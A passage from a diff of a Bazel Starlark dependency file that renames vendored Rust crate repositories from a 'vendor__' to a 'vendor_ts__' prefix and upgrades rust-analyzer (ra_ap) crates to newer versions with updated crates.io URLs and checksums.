maybe( http_archive, - name = "vendor__overload-0.1.1", + name = "vendor_ts__overload-0.1.1", sha256 = "b15813163c1d831bf4a13c3610c05c0d03b39feb07f7e09fa234dac9b15aaf39", type = "tar.gz", urls = ["https://static.crates.io/crates/overload/0.1.1/download"], @@ -1895,7 +1916,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__parking_lot-0.12.3", + name = "vendor_ts__parking_lot-0.12.3", sha256 = "f1bf18183cf54e8d6059647fc3063646a1801cf30896933ec2311622cc4b9a27", type = "tar.gz", urls = ["https://static.crates.io/crates/parking_lot/0.12.3/download"], @@ -1905,7 +1926,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__parking_lot_core-0.9.10", + name = "vendor_ts__parking_lot_core-0.9.10", sha256 = "1e401f977ab385c9e4e3ab30627d6f26d00e2c73eef317493c4ec6d468726cf8", type = "tar.gz", urls = ["https://static.crates.io/crates/parking_lot_core/0.9.10/download"], @@ -1915,7 +1936,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__pear-0.2.9", + name = "vendor_ts__pear-0.2.9", sha256 = "bdeeaa00ce488657faba8ebf44ab9361f9365a97bd39ffb8a60663f57ff4b467", type = "tar.gz", urls = ["https://static.crates.io/crates/pear/0.2.9/download"], @@ -1925,7 +1946,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__pear_codegen-0.2.9", + name = "vendor_ts__pear_codegen-0.2.9", sha256 = "4bab5b985dc082b345f812b7df84e1bef27e7207b39e448439ba8bd69c93f147", type = "tar.gz", urls = ["https://static.crates.io/crates/pear_codegen/0.2.9/download"], @@ -1935,7 +1956,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__perf-event-0.4.7", + name = "vendor_ts__perf-event-0.4.7", sha256 = "5396562cd2eaa828445d6d34258ae21ee1eb9d40fe626ca7f51c8dccb4af9d66", type = "tar.gz", urls = ["https://static.crates.io/crates/perf-event/0.4.7/download"], @@ -1945,7 +1966,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__perf-event-open-sys-1.0.1", + name = "vendor_ts__perf-event-open-sys-1.0.1", sha256 = "ce9bedf5da2c234fdf2391ede2b90fabf585355f33100689bc364a3ea558561a", type = "tar.gz", urls = ["https://static.crates.io/crates/perf-event-open-sys/1.0.1/download"], @@ -1955,7 +1976,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__petgraph-0.6.5", + name = "vendor_ts__petgraph-0.6.5", sha256 = "b4c5cc86750666a3ed20bdaf5ca2a0344f9c67674cae0515bec2da16fbaa47db", type = "tar.gz", urls = ["https://static.crates.io/crates/petgraph/0.6.5/download"], @@ -1965,7 +1986,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__pin-project-lite-0.2.16", + name = "vendor_ts__pin-project-lite-0.2.16", sha256 = "3b3cff922bd51709b605d9ead9aa71031d81447142d828eb4a6eba76fe619f9b", type = "tar.gz", urls = ["https://static.crates.io/crates/pin-project-lite/0.2.16/download"], @@ -1975,7 +1996,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__powerfmt-0.2.0", + name = "vendor_ts__powerfmt-0.2.0", sha256 = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391", type = "tar.gz", urls = ["https://static.crates.io/crates/powerfmt/0.2.0/download"], @@ -1985,7 +2006,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__ppv-lite86-0.2.20", + name = "vendor_ts__ppv-lite86-0.2.20", sha256 = "77957b295656769bb8ad2b6a6b09d897d94f05c41b069aede1fcdaa675eaea04", type = "tar.gz", urls = ["https://static.crates.io/crates/ppv-lite86/0.2.20/download"], @@ -1995,7 +2016,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__proc-macro2-1.0.93", + name = "vendor_ts__proc-macro2-1.0.93", sha256 = "60946a68e5f9d28b0dc1c21bb8a97ee7d018a8b322fa57838ba31cc878e22d99", type = "tar.gz", urls = ["https://static.crates.io/crates/proc-macro2/1.0.93/download"], @@ -2005,7 +2026,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__proc-macro2-diagnostics-0.10.1", + name = "vendor_ts__proc-macro2-diagnostics-0.10.1", sha256 = "af066a9c399a26e020ada66a034357a868728e72cd426f3adcd35f80d88d88c8", type = "tar.gz", urls = ["https://static.crates.io/crates/proc-macro2-diagnostics/0.10.1/download"], @@ -2015,7 +2036,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__quote-1.0.38", + name = "vendor_ts__quote-1.0.38", sha256 = "0e4dccaaaf89514f546c693ddc140f729f958c247918a13380cccc6078391acc", type = "tar.gz", urls = ["https://static.crates.io/crates/quote/1.0.38/download"], @@ -2025,367 +2046,367 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__ra-ap-rustc_abi-0.87.0", - sha256 = "28b782af0a7a8df16ddf43cd70da9f17bc3b1ce712c9e4992b6edb16f5f53632", + name = "vendor_ts__ra-ap-rustc_abi-0.97.0", + sha256 = "3829c3355d1681ffeaf1450ec71edcdace6820fe2e86469d8fc1ad45e2c96460", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_abi/0.87.0/download"], - strip_prefix = "ra-ap-rustc_abi-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_abi-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_abi/0.97.0/download"], + strip_prefix = "ra-ap-rustc_abi-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_abi-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra-ap-rustc_index-0.87.0", - sha256 = "ce5742f134960482f543b35ecebec3cacc6d79a9a685713518b4d8d70c5f9aa8", + name = "vendor_ts__ra-ap-rustc_hashes-0.97.0", + sha256 = "1bd4d6d4c434bec08e02370a4f64a4985312097215a62e82d0f757f3a98e502e", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_index/0.87.0/download"], - strip_prefix = "ra-ap-rustc_index-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_index-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_hashes/0.97.0/download"], + strip_prefix = "ra-ap-rustc_hashes-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_hashes-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra-ap-rustc_index_macros-0.87.0", - sha256 = "d7ea011fcf68309a8835ad01d91c032cb18444617b00e2cab21d45b208164441", + name = "vendor_ts__ra-ap-rustc_index-0.97.0", + sha256 = "bad6fc4bd7522e31096e2de5b0351144fe0684b608791ee26c842bf2da1b19ae", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_index_macros/0.87.0/download"], - strip_prefix = "ra-ap-rustc_index_macros-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_index_macros-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_index/0.97.0/download"], + strip_prefix = "ra-ap-rustc_index-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_index-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra-ap-rustc_lexer-0.87.0", - sha256 = "eb76f0a4d4c20859e41f0a23bff0f37ab9ca9171c214a6c7dd72ea69434865dc", + name = "vendor_ts__ra-ap-rustc_index_macros-0.97.0", + sha256 = "cfb234e1f84b92be45276c3025bee18789e9bc95bec8789bec961e78edb01c52", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_lexer/0.87.0/download"], - strip_prefix = "ra-ap-rustc_lexer-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_lexer-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_index_macros/0.97.0/download"], + strip_prefix = "ra-ap-rustc_index_macros-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_index_macros-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra-ap-rustc_parse_format-0.87.0", - sha256 = "06080bd35078305421a62da77f3c128482d8d44441b6da8ce9d146d1cd9cdb5b", + name = "vendor_ts__ra-ap-rustc_lexer-0.97.0", + sha256 = "7a3a40bd11dc43d1cb110e730b80620cf8102f4cca8920a02b65954da0ed931f", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_parse_format/0.87.0/download"], - strip_prefix = "ra-ap-rustc_parse_format-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_parse_format-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_lexer/0.97.0/download"], + strip_prefix = "ra-ap-rustc_lexer-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_lexer-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra-ap-rustc_pattern_analysis-0.87.0", - sha256 = "68a3154fe4c20c177d7b3c678a2d3a97aba0cca156ddef88959915041889daf0", + name = "vendor_ts__ra-ap-rustc_parse_format-0.97.0", + sha256 = "5feb877478994cb4c0c0c7a5116a352eefc0634aefc8636feb00a893fa5b7135", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_pattern_analysis/0.87.0/download"], - strip_prefix = "ra-ap-rustc_pattern_analysis-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_parse_format/0.97.0/download"], + strip_prefix = "ra-ap-rustc_parse_format-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_parse_format-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_base_db-0.0.258", - sha256 = "548b95b278a8f6f888a0bb6cb7bf4201fe920d3800cd99770054e5eb72f3cd6a", + name = "vendor_ts__ra-ap-rustc_pattern_analysis-0.97.0", + sha256 = "a76774d35934d464c4115908cde16f76a4f7e540fe1eea6b79336c556e37bdd3", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_base_db/0.0.258/download"], - strip_prefix = "ra_ap_base_db-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_base_db-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_pattern_analysis/0.97.0/download"], + strip_prefix = "ra-ap-rustc_pattern_analysis-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_cfg-0.0.258", - sha256 = "921e2b0232d1e8352eb9f476bb55c1d8bcbed0531adc17c74aa711fef015c851", + name = "vendor_ts__ra_ap_base_db-0.0.266", + sha256 = "5d8e4a327f1a8ace5afced54ebaa1a34f8cf0bb535a28aefb8300e8ea49a7d6e", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_cfg/0.0.258/download"], - strip_prefix = "ra_ap_cfg-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_cfg-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_base_db/0.0.266/download"], + strip_prefix = "ra_ap_base_db-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_base_db-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_edition-0.0.258", - sha256 = "a7cc6633305d878cafb4a4482e7e7002d1a5d7b15fa837728b6613ff5336f8a4", + name = "vendor_ts__ra_ap_cfg-0.0.266", + sha256 = "4d974450788b1f90243c5f2231875ed4d7087444975c0190a1c2cb02c3ed465d", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_edition/0.0.258/download"], - strip_prefix = "ra_ap_edition-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_edition-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_cfg/0.0.266/download"], + strip_prefix = "ra_ap_cfg-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_cfg-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_hir-0.0.258", - sha256 = "6e3f6b31381a297e5bb4fa76108a2cf7bf8d35067a130f932aa6fdfb733ba3a1", + name = "vendor_ts__ra_ap_edition-0.0.266", + sha256 = "c3b1b961a84cb09a4e06e44d06b2e77bcf546d0c2623df9545ba9cc694880989", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_hir/0.0.258/download"], - strip_prefix = "ra_ap_hir-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_edition/0.0.266/download"], + strip_prefix = "ra_ap_edition-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_edition-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_hir_def-0.0.258", - sha256 = "84144bdda7af170e660d312982889622f4a5361c1bb74df2afa2a6ce17d48644", + name = "vendor_ts__ra_ap_hir-0.0.266", + sha256 = "ff0672e35a6cf12333cb6b9e3fd18aba4bc724fa7c7b24c3253df4730be1f9c3", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_hir_def/0.0.258/download"], - strip_prefix = "ra_ap_hir_def-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_def-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_hir/0.0.266/download"], + strip_prefix = "ra_ap_hir-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_hir_expand-0.0.258", - sha256 = "441661b394acfa4f3ac4cb54386f8ee8b451504ec167b0bf0e4200da1bbca50d", + name = "vendor_ts__ra_ap_hir_def-0.0.266", + sha256 = "fde2fb9361257e31e73e63eb2d07445ea3fd4cd1e7bae7f45e7ba82bcfcde29a", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_hir_expand/0.0.258/download"], - strip_prefix = "ra_ap_hir_expand-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_expand-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_hir_def/0.0.266/download"], + strip_prefix = "ra_ap_hir_def-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_def-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_hir_ty-0.0.258", - sha256 = "6feea30dff289f33a8ed76172ff4cb299db22d224f88735aa2c7f49ba1e5e77f", + name = "vendor_ts__ra_ap_hir_expand-0.0.266", + sha256 = "1823b649710bf1829c894f774dfe66acb33a3e5bc7409ff7836cd19f6e09c250", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_hir_ty/0.0.258/download"], - strip_prefix = "ra_ap_hir_ty-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_ty-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_hir_expand/0.0.266/download"], + strip_prefix = "ra_ap_hir_expand-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_expand-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_ide_db-0.0.258", - sha256 = "7e33bd5a0139b6c74d34ed963494115abe3f9c95cf5936871ab3d9b548ccbbdf", + name = "vendor_ts__ra_ap_hir_ty-0.0.266", + sha256 = "72a591a02787bd2e938c25fceb1f831d0929b9c08726e6d831f85c4a9fba04b5", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_ide_db/0.0.258/download"], - strip_prefix = "ra_ap_ide_db-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_ide_db-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_hir_ty/0.0.266/download"], + strip_prefix = "ra_ap_hir_ty-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_hir_ty-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_intern-0.0.258", - sha256 = "faa7ee24ae9bf4d2536ef7fb6de35f30856edbf7b3d6ac02e5a2532118896569", + name = "vendor_ts__ra_ap_ide_db-0.0.266", + sha256 = "c74386061453edc3ebfd52141c7c3cde109a7427faff9792a303c3c09a762a01", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_intern/0.0.258/download"], - strip_prefix = "ra_ap_intern-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_intern-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_ide_db/0.0.266/download"], + strip_prefix = "ra_ap_ide_db-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_ide_db-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_limit-0.0.258", - sha256 = "90d8a2aecbd488cf79b430bd5abe6650da44ae58b31cd6052c909dbd3f5d5926", + name = "vendor_ts__ra_ap_intern-0.0.266", + sha256 = "8239ffde688b558a4335f03d14fa42dcebb203f452367830554b18e17ff1c683", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_limit/0.0.258/download"], - strip_prefix = "ra_ap_limit-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_limit-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_intern/0.0.266/download"], + strip_prefix = "ra_ap_intern-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_intern-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_load-cargo-0.0.258", - sha256 = "6e2372aadd32e85460de595891c8b3562126166bc94fdc24508d6784c9d93357", + name = "vendor_ts__ra_ap_load-cargo-0.0.266", + sha256 = "01dd50ca287042b06ca3cc62b60e6891bacee3886d39381d26f9f966e509b1c7", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_load-cargo/0.0.258/download"], - strip_prefix = "ra_ap_load-cargo-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_load-cargo-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_load-cargo/0.0.266/download"], + strip_prefix = "ra_ap_load-cargo-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_load-cargo-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_mbe-0.0.258", - sha256 = "bf69ba82adb6e436617ecd09c0ff58006f376060dff437eb9fd383c2983f6d01", + name = "vendor_ts__ra_ap_mbe-0.0.266", + sha256 = "c193592a0d1dcd315cf8c60f25d37a15c6b50c2b58bfbc6eac38b123e45c8c21", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_mbe/0.0.258/download"], - strip_prefix = "ra_ap_mbe-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_mbe-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_mbe/0.0.266/download"], + strip_prefix = "ra_ap_mbe-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_mbe-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_parser-0.0.258", - sha256 = "8f499b6c33a588d60ed9722d057954a21ec01913b97a5693ff40ba4828ffa7b9", + name = "vendor_ts__ra_ap_parser-0.0.266", + sha256 = "b380f96951dd56b8231eeb47884fea12c57b8515ac748eedd590b26cd156681c", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_parser/0.0.258/download"], - strip_prefix = "ra_ap_parser-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_parser-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_parser/0.0.266/download"], + strip_prefix = "ra_ap_parser-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_parser-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_paths-0.0.258", - sha256 = "b5a16df131fa641a4af4d9488152b7b332a6a30e93bc655fdbe88f555ba28825", + name = "vendor_ts__ra_ap_paths-0.0.266", + sha256 = "0801105582f532bc59a2b5714a30966c4cf9bd3e5b66f4161763c1d974d2c7d5", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_paths/0.0.258/download"], - strip_prefix = "ra_ap_paths-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_paths-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_paths/0.0.266/download"], + strip_prefix = "ra_ap_paths-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_paths-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_proc_macro_api-0.0.258", - sha256 = "3480e0d07197ebcc2db5836b0c39625e07b0d77c6471a2a748e5bdf54ce556e3", + name = "vendor_ts__ra_ap_proc_macro_api-0.0.266", + sha256 = "da377b243e376b82819f875c1c6624125d27b682a740bd4cafc30b4f496d0ffa", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_proc_macro_api/0.0.258/download"], - strip_prefix = "ra_ap_proc_macro_api-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_proc_macro_api-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_proc_macro_api/0.0.266/download"], + strip_prefix = "ra_ap_proc_macro_api-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_proc_macro_api-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_profile-0.0.258", - sha256 = "95b707dd9c92139030587d81b3333428f48af8f4728330ed12101ab0bb431d72", + name = "vendor_ts__ra_ap_profile-0.0.266", + sha256 = "4d6d1391bee4f86e56385438a2dcb739cbb96bd0fbf49799a492332d57e6db62", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_profile/0.0.258/download"], - strip_prefix = "ra_ap_profile-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_profile-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_profile/0.0.266/download"], + strip_prefix = "ra_ap_profile-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_profile-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_project_model-0.0.258", - sha256 = "551a0de5a16f0538fbaf401a319d81d1a034f7aa014e46ac87c5bd74229a211b", + name = "vendor_ts__ra_ap_project_model-0.0.266", + sha256 = "e8b1ac2712d5f6a20197b360890031e64b4ea097b511f50e2cb8ab1a0e24f577", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_project_model/0.0.258/download"], - strip_prefix = "ra_ap_project_model-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_project_model-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_project_model/0.0.266/download"], + strip_prefix = "ra_ap_project_model-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_project_model-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_salsa-0.0.258", - sha256 = "6ec0c82d9e5affbf7d582750b301d279589787a5ac729f95756f5a0b0bf2b4a4", + name = "vendor_ts__ra_ap_salsa-0.0.266", + sha256 = "bc3a0a272f50e2ab831452bd3f4e7f8a571ccf01282d76f4a078f661135ed0ce", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_salsa/0.0.258/download"], - strip_prefix = "ra_ap_salsa-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_salsa-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_salsa/0.0.266/download"], + strip_prefix = "ra_ap_salsa-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_salsa-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_salsa-macros-0.0.258", - sha256 = "8440192eb549dda1cdefc95eaa1fc42ad13cfbd303add757517d77c81e7dc2e1", + name = "vendor_ts__ra_ap_salsa-macros-0.0.266", + sha256 = "d5d59b47a54fd5468ce0dc03b146afd0932ae0f3d05a5c15ca78d29d5e85bc31", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_salsa-macros/0.0.258/download"], - strip_prefix = "ra_ap_salsa-macros-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_salsa-macros-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_salsa-macros/0.0.266/download"], + strip_prefix = "ra_ap_salsa-macros-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_salsa-macros-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_span-0.0.258", - sha256 = "18690685d10da2577d7821d46c0de5a884bf1755e59635cbb1a795451e2a4acc", + name = "vendor_ts__ra_ap_span-0.0.266", + sha256 = "f10dbdd611d2546be7c400934007865e85bb37570566c715edb3aac76367a782", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_span/0.0.258/download"], - strip_prefix = "ra_ap_span-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_span-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_span/0.0.266/download"], + strip_prefix = "ra_ap_span-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_span-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_stdx-0.0.258", - sha256 = "4016934faae8413b4ad3f1bf063c7ffccdcfdf3f67ff32f4a79a197a3c1cb0da", + name = "vendor_ts__ra_ap_stdx-0.0.266", + sha256 = "b7d5c58fcda9b35d61e23f334b2b11221abf53e7f5e4344fc7eb1de18b2cbf68", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_stdx/0.0.258/download"], - strip_prefix = "ra_ap_stdx-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_stdx-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_stdx/0.0.266/download"], + strip_prefix = "ra_ap_stdx-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_stdx-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_syntax-0.0.258", - sha256 = "e8e381d21d166d12b11906171f82382473d60abfead0c4acc6d7d07150f87f73", + name = "vendor_ts__ra_ap_syntax-0.0.266", + sha256 = "75334f45a8095223823ef1d2789c085460b7b9368c63a6430d46f6f2b9bd5cb5", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_syntax/0.0.258/download"], - strip_prefix = "ra_ap_syntax-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_syntax-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_syntax/0.0.266/download"], + strip_prefix = "ra_ap_syntax-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_syntax-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_syntax-bridge-0.0.258", - sha256 = "65f1960218acd2ed8e486e7bd24f80a7eb89591906c6b0831296b2a75c556b2f", + name = "vendor_ts__ra_ap_syntax-bridge-0.0.266", + sha256 = "b331a50f90ae587d230b1b55b3852ebf67ab740dec33c1a4b0900005037e77c2", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_syntax-bridge/0.0.258/download"], - strip_prefix = "ra_ap_syntax-bridge-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_syntax-bridge-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_syntax-bridge/0.0.266/download"], + strip_prefix = "ra_ap_syntax-bridge-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_syntax-bridge-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_toolchain-0.0.258", - sha256 = "c9195f69ff02f076f5a726c7fbafa2b4639d00235906cb44e52ca75cd8b33c30", + name = "vendor_ts__ra_ap_toolchain-0.0.266", + sha256 = 